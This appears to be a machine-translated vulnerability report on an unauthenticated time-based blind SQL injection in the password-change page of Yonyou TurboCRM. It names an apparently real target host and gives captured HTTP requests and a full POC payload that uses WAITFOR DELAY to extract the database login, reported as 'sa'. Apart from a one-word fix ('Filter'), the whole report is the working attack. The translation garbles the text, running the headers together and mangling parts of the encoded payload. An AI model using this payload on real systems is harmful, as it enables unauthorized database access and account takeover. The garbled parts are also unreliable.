Yonyou CRM Injection Vulnerability (No Logon is required to kill all versions)

Yonyou CRM Injection Vulnerability (No Logon is required to kill all versions)

A system injection vulnerability in UFIDA allows you to kill all versions without logon.

Yonyou TurboCRM has common SQL injection.


Http://crm.varsal.com.cn: 8081/login. php

Find the password retrieval page
 

Access

Http://crm.varsal.com.cn: 8081/login/changepswd. php? Orgcode = 1 & loginname = system
 

Packet capture with input information
 

POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1Host: crm.varsal.com.cn:8081User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=systemContent-Length: 95Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1Connection: keep-alivePragma: no-cacheCache-Control: no-cachesubmit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1&loginname=system&key=-1

 

Algorithm: Vector: IF ([INFERENCE]) waitfor delay '0: 0: [SLEEPTIME] '--
 

POC
 

POST /login/changepswd.php?orgcode=1&loginname=system HTTP/1.1Accept-language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-encoding: gzip,deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox32.0Host: crm.varsal.com.cn:8081Referer: http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginnamesystemPragma: no-cacheCache-control: no-cacheX-Requested-With: XMLHttpRequestContent-type: application/x-www-form-urlencoded; charset=UTF-8Cookie: PHPSESSID=8a4jg4pb034v5dcbachfllljd1Content-length: 276Connection: closesubmit=1&oldpassword=aaaaa&password=aaaaaa&confirmpswd=aaaaaa&orgcode=1%27%20IF28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28SYSTEM_USER%20AS%20NVARCHAR284000%29%29%2CCHAR%2832%29%29%29%2C3%2C1%29%29%3E1%29%20WAITFOR%20DELAY%20%2703A0%3A1%27--&loginname=system&key=-1

User sa

 

Solution:

Filter